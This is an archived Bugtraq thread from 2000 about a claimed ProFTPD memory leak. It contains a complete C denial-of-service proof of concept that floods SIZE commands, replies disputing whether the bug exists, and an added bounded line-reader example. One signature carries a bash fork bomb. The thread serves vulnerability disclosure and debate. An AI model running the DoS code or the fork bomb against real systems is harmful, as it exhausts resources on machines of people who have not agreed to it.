5881661 2000-12-20 16:38 +0100  /20 lines/ Piotr Zurawski <szur@IX.RENET.PL>
Sent by: joel@lysator.liu.se
Imported: 2000-12-21  00:56  by Brevbäraren (which is implemented in) Python
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: szur@IX.RENET.PL
Recipient: Bugtraq (import) <14399>
Subject: ProFTPD 1.2.0 Memory leakage - denial of service
------------------------------------------------------------
  This is sample code to demonstrate the effects of a memory leak in the
ProFTPD daemon. As far as I know, all available versions to date
(19.12.2000) are vulnerable to this.

  This bug is not dangerous if you run one instance of the included code.
But consider what will happen if someone runs about 20 sessions...
Wojciech Purczynski reported that the memory leak also exists when other
FTP commands are invoked (e.g. STAT).
  Of course the daemon will consume only as much as is defined in the
limits of the user the daemon runs as. If you use setrlimit() in the source,
pam, or ulimit before you start the daemon, this probably won't hurt
so much.

--
Piotr Zurawski [fb]
szur@ix.renet.pl
(5881661) --------------------------------(Rewrapped)
Attachment (text/plain) in text 5881662
Comment in text 5884743 by Michal Zalewski <lcamtuf@DIONE.IDS.PL>

5881662 2000-12-20 16:38 +0100  /136 lines/ Piotr Zurawski <szur@IX.RENET.PL>
Imported: 2000-12-21  00:56  by Brevbäraren (which is implemented in) Python
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: szur@IX.RENET.PL
Recipient: Bugtraq (import) <14400>
Attachment (text/plain) to text 5881661
Subject: Attachment to: ProFTPD 1.2.0 Memory leakage - denial of service
------------------------------------------------------------
/* Proftpd DoS
 * by Piotr Zurawski (szur@ix.renet.pl)
 * This source is just an example of memory leakage in proftpd-1.2.0(rc2)
 * server discovered by Wojciech Purczynski.
 */

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

#define USERNAME "anonymous"
#define PASSWORD "dupa@dupa.pl"
#define HOWMANY 10000

/* control connection to the FTP server, shared by the helpers below */
int fd;
struct in_addr host;
unsigned short port = 21;

void logintoftp(void);
void sendsizes(void);
void wait_for_reply(void);
int tcp_connect(struct in_addr addr, unsigned short port);
int resolve(char *hostname, struct in_addr *addr);

int main(int argc, char **argv)
{
	if (argc < 2) {
		fprintf(stderr, "usage: %s <host>\n", argv[0]);
		exit(1);
	}

	if (!resolve(argv[1], &host)) {
		fprintf(stderr, "Hostname lookup failure\n");
		exit(1);
	}

	fd = tcp_connect(host, port);

	/* consume the 220 greeting before talking to the server */
	wait_for_reply();

	logintoftp();

	printf("Logged\n");

	sendsizes();

	printf("Now check out memory usage of proftpd daemon:\n");
	printf("Resident set size (RSS) and virtual memory size (VSIZE)\n");
	printf("fields in ps output\n");

	close(fd);
	return 0;
}

/* read until at least one complete line of the server's reply has arrived */
void wait_for_reply(void)
{
	char rcv[1024];
	int n;

	/* read one byte less than the buffer so the NUL terminator fits */
	while ((n = read(fd, rcv, sizeof(rcv) - 1)) > 0) {
		rcv[n] = '\0';
		if (strchr(rcv, '\n') != NULL)
			break;
	}
}

void logintoftp(void)
{
	char snd[1024];

	printf("Logging " USERNAME "/" PASSWORD "\n");

	snprintf(snd, sizeof(snd), "USER %s\r\n", USERNAME);
	write(fd, snd, strlen(snd));
	wait_for_reply();

	snprintf(snd, sizeof(snd), "PASS %s\r\n", PASSWORD);
	write(fd, snd, strlen(snd));
	wait_for_reply();
}

void sendsizes(void)
{
	char snd[1024];
	unsigned long loop;

	printf("Sending %i size commands... \n", HOWMANY);

	for (loop = 0; loop < HOWMANY; loop++) {
		/* sent exactly as in the original post: no CRLF after the command */
		snprintf(snd, sizeof(snd), "SIZE /dadasjasojdasj/adhjaodhahasohasaoihroaha");
		write(fd, snd, strlen(snd));
	}
}

int tcp_connect(struct in_addr addr, unsigned short port)
{
	int fd;
	struct sockaddr_in serv;

	memset(&serv, 0, sizeof(serv));
	serv.sin_addr = addr;
	serv.sin_port = htons(port);
	serv.sin_family = AF_INET;

	if ((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
		perror("socket");
		exit(1);
	}

	if (connect(fd, (struct sockaddr *)&serv, sizeof(serv)) < 0) {
		perror("connect");
		exit(1);
	}

	return fd;
}

/* look up hostname and copy its first IPv4 address into *addr */
int resolve(char *hostname, struct in_addr *addr)
{
	struct hostent *res;

	res = gethostbyname(hostname);
	if (res == NULL || res->h_addrtype != AF_INET)
		return 0;
	memcpy(addr, res->h_addr, sizeof(*addr));
	return 1;
}
(5881662) ------------------------------------------
5884743 2000-12-21 17:29 +0100  /34 lines/ Michal Zalewski <lcamtuf@DIONE.IDS.PL>
Sent by: joel@lysator.liu.se
Imported: 2000-12-21  23:01  by Brevbäraren (which is implemented in) Python
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: lcamtuf@DIONE.IDS.PL
Recipient: Bugtraq (import) <14452>
Comment on text 5881661 by Piotr Zurawski <szur@IX.RENET.PL>
Subject: Re: ProFTPD 1.2.0 Memory leakage - denial of service
------------------------------------------------------------
From: Michal Zalewski <lcamtuf@DIONE.IDS.PL>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <Pine.LNX.4.30.0012211725510.15053-100000@dione.ids.pl>

On Wed, 20 Dec 2000, Piotr Zurawski wrote:

> This is sample code to demonstrate effects of memory leak in ProFTPD
> daemon. As far as I know all available versions up to date
> (19.12.2000) are vulnerable to this.

Heheh....

        for(loop=0;loop<HOWMANY;loop++)
        {
        sprintf(snd, "SIZE /dadasjasojdasj/adhjaodhahasohasaoihroaha");
        write(fd, snd, strlen(snd));
        }

You are not sending newline characters at the end of each line. In
fact, you are sending a really huge one-line command (this line will be
broken into separate lines on the other side, but only the first line
will start with the "SIZE ..." command in most cases).

Btw. you might want to test such code against other services; IIRC
some services are vulnerable to a very-long-input-line DoS (by memory
exhaustion) as long as they are not implementing reasonable timeouts
and limits.

--
_______________________________________________________
Michal Zalewski [lcamtuf@tpi.pl] [tp.internet/security]
[http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};:
=--=> Did you know that clones never use mirrors? <=--=
(5884743) --------------------------------(Rewrapped)
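Zalewski's two observations, that the unterminated SIZE commands arrive as one enormous line and that a server without line limits and idle timeouts can be exhausted by exactly such input, both come down to how the control connection is read. The following is an added example written for this page, not ProFTPD's own code: a bounded line reader in C. `read_cmd_line`, its return codes and the cap/timeout parameters are this example's own choices; it rejects a line that reaches the cap (draining the rest of it up to the next newline, so the following command is still parsed from a clean boundary) and gives up when no byte arrives within the timeout.

```c
#include <poll.h>
#include <string.h>
#include <unistd.h>

/* Return codes of read_cmd_line() besides a non-negative line length. */
enum { LINE_EOF = -1, LINE_TOO_LONG = -2, LINE_TIMEOUT = -3 };

/* Wait up to timeout_ms for one byte on fd: 1 on success, else a LINE_* code. */
static int read_byte(int fd, int timeout_ms, unsigned char *c)
{
    struct pollfd p = { .fd = fd, .events = POLLIN, .revents = 0 };
    int r = poll(&p, 1, timeout_ms);
    if (r == 0)
        return LINE_TIMEOUT;      /* idle peer: do not wait forever */
    if (r < 0)
        return LINE_EOF;
    return read(fd, c, 1) == 1 ? 1 : LINE_EOF;
}

/* Read one LF- or CRLF-terminated command into buf (cap bytes incl. NUL).
 * Returns the length with the terminator stripped, or a LINE_* code.
 * An over-long line is never accumulated: once the cap is reached the
 * remainder is drained up to the next '\n' and LINE_TOO_LONG is returned,
 * so a single giant "line" cannot grow memory or desynchronise the parser. */
int read_cmd_line(int fd, char *buf, size_t cap, int timeout_ms)
{
    size_t len = 0;
    unsigned char c;
    int r;

    for (;;) {
        if ((r = read_byte(fd, timeout_ms, &c)) != 1)
            return r;
        if (c == '\n') {
            if (len > 0 && buf[len - 1] == '\r')
                len--;
            buf[len] = '\0';
            return (int)len;
        }
        if (len + 1 >= cap) {     /* no room left for byte + NUL: reject */
            while ((r = read_byte(fd, timeout_ms, &c)) == 1 && c != '\n')
                ;
            buf[0] = '\0';
            return r == 1 ? LINE_TOO_LONG : r;
        }
        buf[len++] = (char)c;
    }
}
```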
5881889 2000-12-20 11:48 -0800  /30 lines/  <tj@RAD.GEOLOGY.WASHINGTON.EDU>
Sent by: joel@lysator.liu.se
Imported: 2000-12-21  05:58  by Brevbäraren (which is implemented in) Python
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: tj@RAD.GEOLOGY.WASHINGTON.EDU
Recipient: Bugtraq (import) <14409>
Comment on text 5877630 by Wojciech Purczynski <wp@ELZABSOFT.PL>
Subject: Re: Memory leakage in proftpd leads to remote DoS
------------------------------------------------------------
From: tj@RAD.GEOLOGY.WASHINGTON.EDU
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <Pine.LNX.4.21.0012201146050.26013-100000@rad.geology.washington.edu>

> I've tested on proftd-1.2.0rc2 and people confirmed that this bug exists in
> the latest CVS version.
>
> I had no time to look at the code so no patch is currently available.
> Developers have just been informed.
>
> +--------------------------------------------------------------------+
> | Wojciech Purczynski   wp@elzabsoft.pl  http://www.elzabsoft.pl/~wp |
> | GSM: +48604432981   Linux Administrator   SMS: wp-sms@elzabsoft.pl |
> +------ Public GnuPG Key:  http://www.elzabsoft.pl/~wp/gpg.asc ------+

The developers of proftpd have tried to confirm this bug, using
scripts to issue the SIZE command for hundreds of thousands of
iterations, and failed to verify that it does indeed exist.

Versions of proftpd tested: pre10, rc1, rc2, and CVS.  All failed to
show symptoms of this memory leak.

----------------------------------------------------------------------------
TJ Saunders				tj@rad.geology.washington.edu
System Administrator			Phone: (206) 685-8266
Remote Sensing Lab			Fax: (206) 685-2379
University of Washington
----------------------------------------------------------------------------
(5881889) --------------------------------(Rewrapped)
Comment in text 5887616 by Wojciech Purczynski <wp@ELZABSOFT.PL>
5887616 2000-12-22 13:53 +0100  /26 lines/ Wojciech Purczynski <wp@ELZABSOFT.PL>
Sent by: joel@lysator.liu.se
Imported: 2000-12-22  23:44  by Brevbäraren (which is implemented in) Python
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: wp@ELZABSOFT.PL
Recipient: Bugtraq (import) <14501>
Comment on text 5881889 by  <tj@RAD.GEOLOGY.WASHINGTON.EDU>
Subject: Re: Memory leakage in proftpd leads to remote DoS
------------------------------------------------------------
From: Wojciech Purczynski <wp@ELZABSOFT.PL>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <Pine.LNX.4.30.0012221339240.22766-100000@alfa.elzabsoft.pl>

> The developers of proftpd have tried to confirm this bug, using scripts to
> issue the SIZE command for hundreds of thousands of iterations, and failed to
> verify that it does indeed exist.
>
> Versions of proftpd tested: pre10, rc1, rc2, and CVS.  All failed to show
> symptoms of this memory leak.

I've investigated the problem a little bit more and it seems that this
memory leakage really _exists_, but only if proftpd runs in INETD mode.

If proftpd works as a standalone daemon it works fine and does not
consume system memory.

Merry Christmas and Happy New Millennium :)
wp

+--------------------------------------------------------------------+
| Wojciech Purczynski   wp@elzabsoft.pl  http://www.elzabsoft.pl/~wp |
| GSM: +48604432981   Linux Administrator   SMS: wp-sms@elzabsoft.pl |
+------ Public GnuPG Key:  http://www.elzabsoft.pl/~wp/gpg.asc ------+
(5887616) --------------------------------(Rewrapped)
Comment in text 5889692 by Rodrigo Barbosa (aka morcego) <rodrigob@CONECTIVA.COM.BR>
5889692 2000-12-22 18:07 -0200  /31 lines/ Rodrigo Barbosa (aka morcego) <rodrigob@CONECTIVA.COM.BR>
Sent by: joel@lysator.liu.se
Imported: 2000-12-25  01:17  by Brevbäraren (which is implemented in) Python
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: rodrigob@CONECTIVA.COM.BR
Recipient: Bugtraq (import) <14507>
Comment on text 5887616 by Wojciech Purczynski <wp@ELZABSOFT.PL>
Subject: Re: Memory leakage in proftpd leads to remote DoS
------------------------------------------------------------
On Fri, Dec 22, 2000 at 01:53:01PM +0100, Wojciech Purczynski wrote:
> > The developers of proftpd have tried to confirm this bug, using scripts to
> > issue the SIZE command for hundreds of thousands of iterations, and failed to
> > verify that it does indeed exist.
> >
> > Versions of proftpd tested: pre10, rc1, rc2, and CVS.  All failed to show
> > symptoms of this memory leak.
>
> I've investigated the problem a little bit more and it seems that this
> memory leakage really _exists_, but only if proftpd runs in INETD mode.
>
> If proftpd works as a standalone daemon it works fine and does not consume
> system memory.

I'll not repeat here all we said and discussed before. If anyone wants
any further information on this, please refer to
http://bugs.proftpd.net/show_bug.cgi?id=408

The official position is: this bug does not exist.
No one ever showed us any way we could reproduce it. All reports only
showed lack of comprehension and misguidance.

Tkx

-- 
 Rodrigo Barbosa (morcego)  - rodrigob at conectiva.com.br
 Conectiva R&D Team         - http://distro.conectiva.com.br
 "Quis custodiet custodes?" - http://www.conectiva.com
(5889692) ------------------------------------------
Attachment (application/pgp-signature) in text 5889693
5889693 2000-12-22 18:07 -0200  /10 lines/ Rodrigo Barbosa (aka morcego) <rodrigob@CONECTIVA.COM.BR>
Imported: 2000-12-25  01:17  by Brevbäraren (which is implemented in) Python
External recipient: BUGTRAQ@SECURITYFOCUS.COM
External replies to: rodrigob@CONECTIVA.COM.BR
Recipient: Bugtraq (import) <14508>
Attachment (text/plain) to text 5889692
Subject: Attachment to: Re: Memory leakage in proftpd leads to remote DoS
------------------------------------------------------------
(5889693) ------------------------------------------